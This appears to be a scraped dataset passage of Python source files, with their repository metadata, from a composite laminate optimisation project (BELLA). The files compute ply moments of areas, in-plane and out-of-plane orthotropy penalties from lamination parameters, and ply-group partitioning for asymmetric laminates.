"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions to calculate moments of areas\r\n\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\ndef calc_mom_of_areas(multipanel, constraints, ply_order):\r\n \"\"\"\r\n calulates ply moments of areas\r\n\r\n OUTPUS\r\n\r\n - mom_areas_plus[panel_index, ply_index, 0]:\r\n signed area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 1]:\r\n signed first moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 2]:\r\n signed second moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n\r\n - mom_areas[panel_index, ply_index, 0]:\r\n area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas[panel_index, ply_index, 1]:\r\n first moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n - mom_areas[panel_index, ply_index, 2]:\r\n second moment of area of ply of index 'ply_index' in panel of index\r\n 'panel_index'\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - multipanel: multi-panel structure\r\n - ply_order: ply indices sorted in the order in which plies are optimised\r\n \"\"\"\r\n mom_areas_plus = []\r\n mom_areas = []\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n\r\n if constraints.sym:\r\n\r\n ply_indices = np.arange(panel.n_plies // 2 + panel.n_plies % 2)\r\n mom_areas_panel = np.zeros((\r\n panel.n_plies // 2 + panel.n_plies % 2, 3), float)\r\n mom_areas_plus_panel = np.zeros((\r\n panel.n_plies // 2 + panel.n_plies % 2, 3), float)\r\n\r\n pos_bot = (2 / panel.n_plies) * ply_indices - 1\r\n pos_top = (2 / panel.n_plies) * (ply_indices + 1) - 1\r\n\r\n if panel.n_plies % 2:\r\n pos_top[-1] = 0\r\n\r\n# print(pos_bot)\r\n# print(pos_top)\r\n\r\n mom_areas_panel[:, 0] = pos_top - pos_bot\r\n mom_areas_panel[:, 1] = 0\r\n mom_areas_panel[:, 2] = pos_top**3 - pos_bot**3\r\n\r\n mom_areas_plus_panel[:, 0] = pos_top - pos_bot\r\n mom_areas_plus_panel[:, 1] = abs(pos_top**2 - pos_bot**2)\r\n mom_areas_plus_panel[:, 2] = pos_top**3 - pos_bot**3\r\n\r\n else:\r\n mom_areas_panel = np.zeros((panel.n_plies, 3), float)\r\n mom_areas_plus_panel = np.zeros((panel.n_plies, 3), float)\r\n\r\n ply_indices = np.arange(panel.n_plies)\r\n\r\n print(ply_indices, type(ply_indices))\r\n print(ply_order, type(ply_order))\r\n pos_bot = ((2 / panel.n_plies) \\\r\n * ply_indices - 1)[ply_order[ind_panel]]\r\n pos_top = ((2 / panel.n_plies) \\\r\n * (ply_indices + 1) - 1)[ply_order[ind_panel]]\r\n\r\n mom_areas_panel[:, 0] = pos_top - pos_bot\r\n mom_areas_panel[:, 1] = pos_top**2 - pos_bot**2\r\n mom_areas_panel[:, 2] = pos_top**3 - pos_bot**3\r\n mom_areas_panel /= 2\r\n\r\n\r\n for ind in range(panel.n_plies):\r\n\r\n if pos_top[ind] * pos_bot[ind] >= 0:\r\n mom_areas_plus_panel[\r\n ind, 0] = abs(pos_top[ind] - pos_bot[ind])\r\n mom_areas_plus_panel[\r\n ind, 1] = abs(pos_top[ind]**2 - pos_bot[ind]**2)\r\n mom_areas_plus_panel[\r\n ind, 2] = abs(pos_top[ind]**3 - pos_bot[ind]**3)\r\n else:\r\n mom_areas_plus_panel[\r\n ind, 0] = abs(pos_top[ind]) + abs(pos_bot[ind])\r\n mom_areas_plus_panel[\r\n ind, 1] = abs(pos_top[ind]**2) + abs(pos_bot[ind]**2)\r\n mom_areas_plus_panel[\r\n ind, 2] = abs(pos_top[ind]**3) + abs(pos_bot[ind]**3)\r\n\r\n mom_areas_plus_panel /= 2\r\n\r\n mom_areas_plus.append(mom_areas_plus_panel)\r\n mom_areas.append(mom_areas_panel)\r\n\r\n return 
mom_areas_plus, mom_areas\r\n\r\n\r\ndef calc_mom_of_areas2(multipanel, constraints, mom_areas_plus, pdl,\r\n n_plies_to_optimise):\r\n \"\"\"\r\n calulates ply moments of areas\r\n\r\n OUTPUS\r\n\r\n - cummul_areas[panel_index][ply_index, 0]:\r\n\r\n\r\n INPUTS\r\n\r\n - constraints: lay-up design guidelines\r\n - multipanel: multi-panel structure\r\n - pdl: ply drop layout\r\n - mom_areas_plus[panel_index, ply_index, 0]:\r\n signed area of ply of index 'ply_index' in panel of index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 1]:\r\n signed first moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n - mom_areas_plus[panel_index, ply_index, 2]:\r\n signed second moment of area of ply of index 'ply_index' in panel of\r\n index 'panel_index'\r\n - n_plies_to_optimise: number of plies to optimise during BELLA step 2\r\n \"\"\"\r\n\r\n cummul_areas = np.zeros(\r\n (multipanel.reduced.n_panels, n_plies_to_optimise), float)\r\n cummul_first_mom_areas = np.zeros(\r\n (multipanel.reduced.n_panels, n_plies_to_optimise), float)\r\n cummul_sec_mom_areas = np.zeros(\r\n (multipanel.reduced.n_panels, n_plies_to_optimise), float)\r\n\r\n for ind_panel, panel in enumerate(multipanel.reduced.panels):\r\n counter_plies = -1\r\n for index_ply in range(n_plies_to_optimise):\r\n if pdl[ind_panel, index_ply] != -1:\r\n counter_plies += 1\r\n\r\n cummul_areas[ind_panel, index_ply:] \\\r\n += mom_areas_plus[ind_panel][counter_plies][0]\r\n\r\n cummul_first_mom_areas[ind_panel, index_ply:] \\\r\n += mom_areas_plus[ind_panel][counter_plies][1]\r\n\r\n cummul_sec_mom_areas[ind_panel, index_ply:] \\\r\n += mom_areas_plus[ind_panel][counter_plies][2]\r\n\r\n return cummul_areas, cummul_first_mom_areas, cummul_sec_mom_areas\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print('*** Test for the functions calc_moment_of_areas ***\\n')\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n\r\n from src.BELLA.constraints import Constraints\r\n from src.BELLA.panels import Panel\r\n from src.BELLA.multipanels import MultiPanel\r\n from src.BELLA.parameters import Parameters\r\n from src.BELLA.obj_function import ObjFunction\r\n from src.BELLA.ply_order import calc_ply_order\r\n from src.BELLA.pdl_ini import create_initial_pdls\r\n from src.BELLA.divide_panels import divide_panels\r\n\r\n constraints = Constraints(sym=False)\r\n# constraints = Constraints(sym=True)\r\n obj_func_param = ObjFunction(constraints)\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[], n_plies=6)\r\n multipanel = MultiPanel([panel1])\r\n\r\n parameters = Parameters(constraints)\r\n panel1 = Panel(1, constraints, neighbour_panels=[1], n_plies=10)\r\n panel2 = Panel(2, constraints, neighbour_panels=[1], n_plies=8)\r\n multipanel = MultiPanel([panel1, panel2])\r\n multipanel.from_mp_to_blending_strip(\r\n constraints, parameters.n_plies_ref_panel)\r\n ply_order = calc_ply_order(multipanel, constraints)\r\n\r\n indices = ply_order[-1]\r\n n_plies_to_optimise = indices.size\r\n mom_areas_plus, mom_areas = calc_mom_of_areas(\r\n multipanel, constraints, ply_order)\r\n\r\n print('mom_areas_plus')\r\n print(mom_areas_plus[0])\r\n print(mom_areas_plus[1])\r\n print(sum(mom_areas_plus[0]))\r\n print(sum(mom_areas_plus[1]))\r\n print('mom_areas')\r\n print(mom_areas[0])\r\n print(mom_areas[1])\r\n print(sum(mom_areas[0]))\r\n print(sum(mom_areas[1]))\r\n\r\n print('*** Test for the functions calc_mom_of_areas2 ***\\n')\r\n divide_panels(multipanel, parameters, 
constraints)\r\n pdl = create_initial_pdls(\r\n multipanel, constraints, parameters, obj_func_param)[0]\r\n\r\n cummul_areas, cummul_first_mom_areas, cummul_sec_mom_areas = \\\r\n calc_mom_of_areas2(\r\n multipanel, constraints, mom_areas_plus, pdl, n_plies_to_optimise)\r\n\r\n print('cummul_areas')\r\n print(cummul_areas)\r\n\r\n print('cummul_first_mom_areas')\r\n print(cummul_first_mom_areas)\r\n\r\n print('cummul_sec_mom_areas')\r\n print(cummul_sec_mom_areas)\r\n\r\n"
},
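The normalised ply coordinates used in the record above admit a compact self-contained check: ply i of an n-ply laminate spans z in [2i/n - 1, 2(i+1)/n - 1], and its area and first/second moments of area are the halved differences of powers of these bounds (mirroring the asymmetric branch of `calc_mom_of_areas`):

```python
import numpy as np

def ply_moments(n_plies):
    """Signed per-ply area and first/second moments of area on the
    normalised thickness coordinate z in [-1, 1]."""
    i = np.arange(n_plies)
    z_bot = 2 * i / n_plies - 1
    z_top = 2 * (i + 1) / n_plies - 1
    return np.column_stack((z_top - z_bot,
                            z_top ** 2 - z_bot ** 2,
                            z_top ** 3 - z_bot ** 3)) / 2

moments = ply_moments(4)
print(moments)
print(moments.sum(axis=0))   # -> [1. 0. 1.]: the columns telescope to the laminate totals
```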
{
"alpha_fraction": 0.4907154142856598,
"alphanum_fraction": 0.5708938837051392,
"avg_line_length": 37.23728942871094,
"blob_id": "7f0c66cbfa5aa88786fd96c8a13ff4f1e5f6aabf",
"content_id": "a3981711a5589f009915403b44e795a2ecf977f7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13894,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 354,
"path": "/src/guidelines/ipo_oopo.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunctions related to orthotropy requirements\r\n\r\n- calc_penalty_ipo\r\n calculates penalties for the balance constraint based on lamination\r\n parameters\r\n\r\n- ipo_param_1_12\r\n calculates the twelve laminate in-plane orthotropy parameters\r\n\r\n- ipo_param_1_6\r\n calculates the first six laminate in-plane orthotropy parameters\r\n\r\n- ipo_param_7_12\r\n calculates the last six laminate in-plane orthotropy parameters\r\n\r\n- calc_penalty_ipo_param\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n parameters\r\n\r\n- calc_penalty_ipo_oopo_mp\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n lamination parameters for a multi-panel structure\r\n\r\n- calc_penalty_ipo_oopo_ss\r\n calculates penalties for in-plane and out-of plane orthotropy based\r\n lamination parameters for a single-panel structure\r\n\r\n- calc_penalty_oopo_ss\r\n calculates penalties for out-of plane orthotropy based lamination\r\n parameters for a single-panel structure\r\n \"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.CLA.lampam_functions import calc_lampam\r\nfrom src.BELLA.materials import Material\r\nfrom src.BELLA.parameters import Parameters\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.BELLA.panels import Panel\r\nfrom src.BELLA.multipanels import MultiPanel\r\nfrom src.BELLA.divide_panels import divide_panels\r\n\r\ndef ipo_param_1_12(lampam, material, sym):\r\n 'calculates the twelve laminate in-plane orthotropy parameters'\r\n # extensional stifness matrix\r\n A11 = (material.U1 + material.U2*lampam[0] + material.U3*lampam[1])\r\n A12 = (- material.U3*lampam[1] + material.U4)\r\n A22 = (material.U1 - material.U2*lampam[0] + material.U3*lampam[1])\r\n A66 = (- material.U3*lampam[1] + material.U5)\r\n A16 = (0.5*material.U2*lampam[2] + material.U3*lampam[3])\r\n A26 = (0.5*material.U2*lampam[2] - material.U3*lampam[3])\r\n param1 = A16/A11\r\n param2 = A16/A12\r\n param3 = A16/A66\r\n param4 = A26/A12\r\n param5 = A26/A22\r\n param6 = A26/A66\r\n if sym:\r\n param7 = (A12*A26 - A22*A16)/(A22*A66 - A26*A26)\r\n param8 = (A12*A26 - A22*A16)/(A16*A26 - A12*A66)\r\n param9 = (A12*A26 - A22*A16)/(A11*A22 - A12*A12)\r\n param10 = (A12*A16 - A11*A26)/(A16*A26 - A12*A66)\r\n param11 = (A12*A16 - A11*A26)/(A11*A66 - A16*A16)\r\n param12 = (A12*A16 - A11*A26)/(A11*A22 - A12*A12)\r\n else:\r\n # coupling stifness matrix\r\n B11 = (0.25)*(material.U2*lampam[4] + material.U3*lampam[5])\r\n B12 = (0.25)*(- material.U3*lampam[5])\r\n B22 = (0.25)*(- material.U2*lampam[4] + material.U3*lampam[5])\r\n B66 = (0.25)*(- material.U3*lampam[5])\r\n B16 = (0.25)*(0.5*material.U2*lampam[6] + material.U3*lampam[7])\r\n B26 = (0.25)*(0.5*material.U2*lampam[6] - material.U3*lampam[7])\r\n # bend/twist stifness matrix\r\n D11 = (1/12)*(material.U1 + material.U2*lampam[8] + material.U3*lampam[9])\r\n D12 = (1/12)*(- material.U3*lampam[9] + material.U4)\r\n D22 = (1/12)*(material.U1 - material.U2*lampam[8] + material.U3*lampam[9])\r\n D66 = (1/12)*(- material.U3*lampam[9] + material.U5)\r\n D16 = (1/12)*(0.5*material.U2*lampam[10] + material.U3*lampam[11])\r\n D26 = (1/12)*(0.5*material.U2*lampam[10] - material.U3*lampam[11])\r\n A = np.array([[A11, A12, A16],\r\n [A12, A22, A26],\r\n [A16, A26, A66]])\r\n B = np.array([[B11, B12, B16],\r\n [B12, B22, B26],\r\n [B16, B26, B66]])\r\n D = np.array([[D11, D12, 
D16],\r\n [D12, D22, D26],\r\n [D16, D26, D66]])\r\n # reduced menbrane compliance\r\n a = np.linalg.inv(A - B@(np.linalg.inv(D))@B)\r\n a11 = a[0, 0]\r\n a12 = a[0, 1]\r\n a22 = a[1, 1]\r\n a66 = a[2, 2]\r\n a16 = a[0, 2]\r\n a26 = a[1, 2]\r\n param7 = a16/a11\r\n param8 = a16/a12\r\n param9 = a16/a66\r\n param10 = a26/a12\r\n param11 = a26/a22\r\n param12 = a26/a66\r\n return abs(np.array([param1, param2, param3,\r\n param4, param5, param6,\r\n param7, param8, param9,\r\n param10, param11, param12]))\r\n\r\ndef ipo_param_1_6(lampam, material, sym):\r\n 'calculates the first six laminate in-plane orthotropy parameters'\r\n # extensional stifness matrix\r\n A11 = (material.U1 + material.U2*lampam[0] + material.U3*lampam[1])\r\n A12 = (- material.U3*lampam[1] + material.U4)\r\n A22 = (material.U1 - material.U2*lampam[0] + material.U3*lampam[1])\r\n A66 = (- material.U3*lampam[1]+ material.U5)\r\n A16 = (0.5*material.U2*lampam[2] + material.U3*lampam[3])\r\n A26 = (0.5*material.U2*lampam[2] - material.U3*lampam[3])\r\n param1 = A16/A11\r\n param2 = A16/A12\r\n param3 = A16/A66\r\n param4 = A26/A12\r\n param5 = A26/A22\r\n param6 = A26/A66\r\n param1 = A16/A11\r\n param2 = A16/A12\r\n param3 = A16/A66\r\n param4 = A26/A12\r\n param5 = A26/A22\r\n param6 = A26/A66\r\n return abs(np.array([param1, param2, param3,\r\n param4, param5, param6]))\r\n\r\n\r\ndef ipo_param_7_12(lampam, material, sym):\r\n 'calculates the last six laminate in-plane orthotropy parameters'\r\n # extensional stifness matrix\r\n A11 = (material.U1 + material.U2*lampam[0] + material.U3*lampam[1])\r\n A12 = (- material.U3*lampam[1] + material.U4)\r\n A22 = (material.U1 - material.U2*lampam[0] + material.U3*lampam[1])\r\n A66 = (- material.U3*lampam[1] + material.U5)\r\n A16 = (0.5*material.U2*lampam[2] + material.U3*lampam[3])\r\n A26 = (0.5*material.U2*lampam[2] - material.U3*lampam[3])\r\n if sym:\r\n param7 = (A12*A26 - A22*A16)/(A22*A66 - A26*A26)\r\n param8 = (A12*A26 - A22*A16)/(A16*A26 - A12*A66)\r\n param9 = (A12*A26 - A22*A16)/(A11*A22 - A12*A12)\r\n param10 = (A12*A16 - A11*A26)/(A16*A26 - A12*A66)\r\n param11 = (A12*A16 - A11*A26)/(A11*A66 - A16*A16)\r\n param12 = (A12*A16 - A11*A26)/(A11*A22 - A12*A12)\r\n else:\r\n # coupling stifness matrix\r\n B11 = (0.25)*(material.U2*lampam[4] + material.U3*lampam[5])\r\n B12 = (0.25)*(- material.U3*lampam[5])\r\n B22 = (0.25)*(- material.U2*lampam[4] + material.U3*lampam[5])\r\n B66 = (0.25)*(- material.U3*lampam[5])\r\n B16 = (0.25)*(0.5*material.U2*lampam[6] + material.U3*lampam[7])\r\n B26 = (0.25)*(0.5*material.U2*lampam[6] - material.U3*lampam[7])\r\n # bend/twist stifness matrix\r\n D11 = (1/12)*(material.U1 + material.U2*lampam[8] + material.U3*lampam[9])\r\n D12 = (1/12)*(- material.U3*lampam[9] + material.U4)\r\n D22 = (1/12)*(material.U1 - material.U2*lampam[8] + material.U3*lampam[9])\r\n D66 = (1/12)*(- material.U3*lampam[9] + material.U5)\r\n D16 = (1/12)*(0.5*material.U2*lampam[10] + material.U3*lampam[11])\r\n D26 = (1/12)*(0.5*material.U2*lampam[10] - material.U3*lampam[11])\r\n A = np.array([[A11, A12, A16],\r\n [A12, A22, A26],\r\n [A16, A26, A66]])\r\n B = np.array([[B11, B12, B16],\r\n [B12, B22, B26],\r\n [B16, B26, B66]])\r\n D = np.array([[D11, D12, D16],\r\n [D12, D22, D26],\r\n [D16, D26, D66]])\r\n # reduced menbrane compliance\r\n a = np.linalg.inv(A - B@(np.linalg.inv(D))@B)\r\n a11 = a[0, 0]\r\n a12 = a[0, 1]\r\n a22 = a[1, 1]\r\n a66 = a[2, 2]\r\n a16 = a[0, 2]\r\n a26 = a[1, 2]\r\n param7 = a16/a11\r\n param8 = a16/a12\r\n param9 = 
a16/a66\r\n param10 = a26/a12\r\n param11 = a26/a22\r\n param12 = a26/a66\r\n return abs(np.array([param7, param8, param9,\r\n param10, param11, param12]))\r\n\r\n\r\ndef calc_penalty_ipo_param(param, threshold):\r\n \"\"\"\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n parameters\r\n \"\"\"\r\n return max(np.array([max(0, abs(param[ii]))\r\n for ii in range(param.size)]))/param.size\r\n# return sum(np.array([max(0, abs(param[ii]) - threshold)/threshold\\\r\n# for ii in range(param.size)]))/param.size\r\n\r\n\r\ndef calc_penalty_ipo(lampam, cummul_areas=1):\r\n \"\"\"\r\n calculates penalties for the balance constraint based on lamination\r\n parameters\r\n \"\"\"\r\n if lampam.ndim == 2:\r\n n_panels = lampam.shape[0]\r\n penalties_ipo = np.zeros((n_panels,), dtype=float)\r\n for ind_panel in range(n_panels):\r\n penalties_ipo[ind_panel] = (\r\n abs(lampam[ind_panel][2]) + abs(lampam[ind_panel][3])) / 2\r\n else:\r\n penalties_ipo = (abs(lampam[2]) + abs(lampam[3])) / 2\r\n return cummul_areas * penalties_ipo\r\n\r\n\r\ndef calc_penalty_ipo_oopo_mp(\r\n lampam,\r\n constraints,\r\n penalty_ipo_switch=True,\r\n parameters=None,\r\n mat=0,\r\n cummul_areas=1,\r\n cummul_sec_mom_areas=1):\r\n \"\"\"\r\n calculates penalties for in-plane orthotropy based on in-plane orthotropy\r\n lamination parameters for a multi-panel structure\r\n\r\n INPUTS\r\n\r\n - lampam: panel lamination parameters\r\n - mat: material properties of the laminae\r\n - constraints: design and maufacturing constraints\r\n - parameters: optimiser parameters\r\n - cummul_areas: sum of the areas of the plies retrieved so far + the\r\n current plies\r\n - cummul_sec_mom_areas: sum of the second moments of areas of the plies\r\n retrieved so far + the current plies\r\n \"\"\"\r\n if parameters is None:\r\n calculate_penalty = True\r\n\r\n n_panels = lampam.shape[0]\r\n penalties_ipo = np.zeros((n_panels,), dtype=float)\r\n penalties_oopo = np.zeros((n_panels,), dtype=float)\r\n if calculate_penalty:\r\n for ind_panel in range(n_panels):\r\n # penalty for in-plane orthotropy\r\n if constraints.ipo and penalty_ipo_switch:\r\n penalties_ipo[ind_panel] = (\r\n abs(lampam[ind_panel][2]) + abs(lampam[ind_panel][3])) / 2\r\n # penalty for out-of-plane orthotropy\r\n if constraints.oopo:\r\n penalties_oopo[ind_panel] = (\r\n abs(lampam[ind_panel][10]) + abs(lampam[ind_panel][11])) / 2\r\n return cummul_areas * penalties_ipo, cummul_sec_mom_areas * penalties_oopo\r\n\r\n\r\n\r\ndef calc_penalty_oopo_ss(lampam, constraints, cummul_sec_mom_areas=1):\r\n \"\"\"\r\n calculates penalties for out-of plane orthotropy based lamination\r\n parameters for a single-panel structure\r\n\r\n INPUTS\r\n\r\n - lampam: lamination parameters\r\n - constraints: design and maufacturing constraints\r\n - cummul_sec_mom_areas: sum of the second moments of areas of the plies\r\n retrieved so far + the current plies\r\n \"\"\"\r\n \r\n if (isinstance(lampam, list) and len(lampam) > 1) or lampam.ndim == 2:\r\n if (isinstance(lampam, list) and len(lampam) > 1):\r\n n_ss = len(lampam)\r\n else:\r\n n_ss = lampam.shape[0]\r\n \r\n penalties_oopo = np.zeros((n_ss,), dtype=float)\r\n if constraints.oopo:\r\n for ind_ss in range(n_ss):\r\n penalties_oopo[ind_ss] = (\r\n abs(lampam[ind_ss][10]) + abs(lampam[ind_ss][11])) / 2\r\n else:\r\n penalties_oopo = 0\r\n if constraints.oopo:\r\n penalties_oopo = (abs(lampam[10]) + abs(lampam[11])) / 2\r\n\r\n return cummul_sec_mom_areas * penalties_oopo\r\n\r\n\r\n\r\nif __name__ == 
\"__main__\":\r\n ss = np.array([0, 45, 45, -45, -45, 90, 45, 90])\r\n ss = np.hstack((ss, np.flip(ss, axis=0)))\r\n lampam = calc_lampam(ss)\r\n E11 = 130e9\r\n E22 = 9e9\r\n nu12 = 0.3\r\n G12 = 4e9\r\n threshold = 0.01\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12)\r\n sym = False\r\n print(\"\"\"*** Test for the functions calc_penalty_ipo_param and ipo_param***\\n\"\"\")\r\n param = ipo_param_1_6(lampam, mat, sym)\r\n print(f'In-plane orthotropy parameters = \\n {param[0:6]}\\n')\r\n print(f'calc_penalty_ipo : {calc_penalty_ipo_param(param, threshold)}\\n')\r\n param = ipo_param_7_12(lampam, mat, sym)\r\n print(f'In-plane orthotropy parameters = \\n {param[0:6]}\\n')\r\n print(f'calc_penalty_ipo : {calc_penalty_ipo_param(param, threshold)}\\n')\r\n param = ipo_param_1_12(lampam, mat, sym)\r\n print(f'In-plane orthotropy parameters = \\n {param[0:6]} \\n{param[6:12]}\\n')\r\n print(f'calc_penalty_ipo : {calc_penalty_ipo_param(param, threshold)}\\n')\r\n\r\n\r\n print('\\n*** Test for the functions calc_penalty_ipo_oopo_mp***\\n')\r\n constraints = Constraints(bal=True, oopo=True)\r\n parameters = Parameters(constraints)\r\n lampam = 0.22*np.ones((2, 12))\r\n lampam_target = 0.11*np.ones((2, 12))\r\n lampam_weightings = np.ones((12,), dtype=float)\r\n E11 = 130e9\r\n E22 = 9e9\r\n nu12 = 0.3\r\n G12 = 4e9\r\n mat = Material(E11=E11, E22=E22, G12=G12, nu12=nu12)\r\n panel_1 = Panel(ID=1,\r\n neighbour_panels=[2],\r\n lampam_target=0.66*np.ones((12,), dtype=float),\r\n n_plies=12,\r\n area=1,\r\n constraints=constraints)\r\n panel_2 = Panel(ID=2,\r\n lampam_target=0.66*np.ones((12,), dtype=float),\r\n n_plies=10,\r\n area=1,\r\n constraints=constraints)\r\n panel_1.lampam_weightings = np.ones((12,), dtype=float)\r\n panel_2.lampam_weightings = np.ones((12,), dtype=float)\r\n boundaries = np.array([[0, 1]])\r\n multipanel = MultiPanel(panels=[panel_1, panel_2])\r\n print(calc_penalty_ipo_oopo_mp(\r\n lampam,\r\n constraints=constraints,\r\n parameters=parameters,\r\n mat=mat,\r\n cummul_areas=4,\r\n cummul_sec_mom_areas=20))\r\n\r\n\r\n"
},
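A condensed sketch of what the record's `ipo_param_1_6` computes: the extensional stiffness terms as linear functions of the material invariants U1..U5 and the in-plane lamination parameters, followed by the six A16/A26 coupling ratios. The invariant values below are placeholders for a generic carbon/epoxy, not values taken from the record:

```python
import numpy as np

def ipo_ratios(lampam, U1, U2, U3, U4, U5):
    """Six in-plane orthotropy ratios from lamination parameters lampam[0:4]."""
    A11 = U1 + U2 * lampam[0] + U3 * lampam[1]
    A12 = U4 - U3 * lampam[1]
    A22 = U1 - U2 * lampam[0] + U3 * lampam[1]
    A66 = U5 - U3 * lampam[1]
    A16 = 0.5 * U2 * lampam[2] + U3 * lampam[3]   # shear-extension coupling
    A26 = 0.5 * U2 * lampam[2] - U3 * lampam[3]
    return np.abs(np.array([A16 / A11, A16 / A12, A16 / A66,
                            A26 / A12, A26 / A22, A26 / A66]))

# a balanced laminate (lampam[2] = lampam[3] = 0) has no coupling: all ratios are 0
print(ipo_ratios(np.array([0.2, 0.1, 0.0, 0.0]),
                 U1=76.4e9, U2=85.7e9, U3=19.7e9, U4=22.6e9, U5=26.9e9))
```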
{
"alpha_fraction": 0.6142417788505554,
"alphanum_fraction": 0.6229507923126221,
"avg_line_length": 36.52631759643555,
"blob_id": "f4e3e1526cd0e317217de4048b3c54438c0ae4b0",
"content_id": "6177ca4736ba46d8e4d179bae4e16658fa3320f8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5856,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 152,
"path": "/src/LAYLA_V02/divide_laminate_asym.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction partitioning laminates into groups of plies for asymmetric laminates\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport math as ma\r\nimport numpy as np\r\n\r\nclass PartitioningError(Exception):\r\n \"Exceptions during partitioning laminates into groups of plies\"\r\n\r\ndef divide_laminate_asym(parameters, targets, step=0):\r\n '''\r\n performs the partitioning of the plies for U-laminates.\r\n\r\n OUTPUTS\r\n\r\n - n_plies_in_groups: number of plies in each group of plies\r\n - pos_first_ply_groups: position of the first ply of each group\r\n with a numbering starting from the bottom to the top of the laminate\r\n - n_groups: the number of steps to be performed by the algorithm\r\n\r\n INPUTS\r\n\r\n - parameters: parameters of the optimiser\r\n - targets.n_plies: number of plies\r\n - step: number of the outer steps\r\n '''\r\n mini = ma.ceil(targets.n_plies/parameters.group_size_max[step])\r\n maxi = ma.floor(targets.n_plies/parameters.group_size_min)\r\n if mini > maxi:\r\n raise PartitioningError('''\r\nPartitioning of the laminate not possible with for asymmetric laminates with\r\nthe current ply-group size limitations.\r\nTry increasing the maximum number of plies per group or reducing the minimum\r\nnumber of plies per group.\r\n''')\r\n\r\n # iteration with increasing number of groups\r\n for n_groups in np.arange(mini, maxi + 1):\r\n # ?\r\n missing = n_groups * parameters.group_size_max[step] \\\r\n - targets.n_plies\r\n if missing > (parameters.group_size_max[step] \\\r\n - parameters.group_size_min)*n_groups:\r\n continue\r\n\r\n #\r\n if n_groups == 0:\r\n continue\r\n\r\n # distribution of parameters.group_size_min plies in each group\r\n n_plies_in_groups = parameters.group_size_min \\\r\n * np.ones((n_groups,), int)\r\n\r\n # n_extra: number of remaining plies to be distributed in the groups\r\n n_extra = targets.n_plies - n_groups*parameters.group_size_min\r\n\r\n # n_n_full_groups: number of groups that can be totally filled by the\r\n # distribution of the remianing plies\r\n if n_extra >= parameters.group_size_max[step] \\\r\n - parameters.group_size_min and n_extra != 0:\r\n n_full_groups = n_extra // (\r\n parameters.group_size_max[step] - parameters.group_size_min)\r\n n_extra %= (\r\n parameters.group_size_max[step] - parameters.group_size_min)\r\n else:\r\n n_full_groups = 0\r\n\r\n if n_full_groups > 0:\r\n n_plies_in_groups[-n_full_groups:] \\\r\n = parameters.group_size_max[step]\r\n # Addition of the last other plies\r\n if n_extra != 0:\r\n n_plies_in_groups[-(n_full_groups + 1)] += n_extra\r\n\r\n # order_of_groups: group sizes in the order in which they\r\n # appear in the stacking sequence\r\n middle_point = ma.ceil(n_groups/2)\r\n order_of_groups = np.zeros((n_groups,), int)\r\n order_of_groups[:middle_point] = n_plies_in_groups[0:2*middle_point:2]\r\n order_of_groups[middle_point:] = np.flip(\r\n n_plies_in_groups[1:n_groups:2], axis=0)\r\n\r\n # pos_of_groups: position of the first ply of each\r\n # group in the order they appear in the final stacking sequence\r\n pos_of_groups = np.zeros((n_groups,), int)\r\n# pos_of_groups[0] = 1\r\n for ind in np.arange(1, n_groups):\r\n pos_of_groups[ind] = pos_of_groups[ind - 1] \\\r\n + order_of_groups[ind - 1]\r\n\r\n pos_first_ply_groups = np.ones((n_groups,), int)\r\n pos_first_ply_groups[0:2*middle_point:2] = pos_of_groups[:middle_point]\r\n pos_first_ply_groups[1:n_groups:2] = np.flip(\r\n pos_of_groups[middle_point:], 
axis=0)\r\n break\r\n\r\n # checking group sizes are correct (should not return an error!!!)\r\n if sum(n_plies_in_groups) != targets.n_plies:\r\n raise PartitioningError('Wrong partitioning!')\r\n\r\n# if n_groups == 1:\r\n# if parameters.group_size_max[step] < 4:\r\n# print('''\r\n#The number of plies of the last group (parameters.group_size_max) is\r\n#recommended to be equal to or greater than 4.\r\n#''')\r\n# if parameters.group_size_min < 4:\r\n# print('''\r\n#The number of plies of the smaller groups (parameters.group_size_min) is\r\n#recommended to be equal to or greater than 4.\r\n#''')\r\n# elif n_groups > 1:\r\n# if parameters.group_size_min < 4:\r\n# print('''\r\n#The number of plies of the smaller groups (parameters.group_size_min) is\r\n#recommended to be equal to or greater than 4.\r\n#''')\r\n# if parameters.group_size_max[step] < 5:\r\n# print('''\r\n#The number of plies of the last group (parameters.group_size_max) is\r\n#recommended to be equal to or greater than 5.\r\n#''')\r\n if n_groups > maxi:\r\n raise PartitioningError('''\r\nNo partition possible of the plies into groups of smaller size\r\nparameters.group_size_minand bigger size parameters.group_size_max.\r\nIncrease parameters.group_size_max or decrease 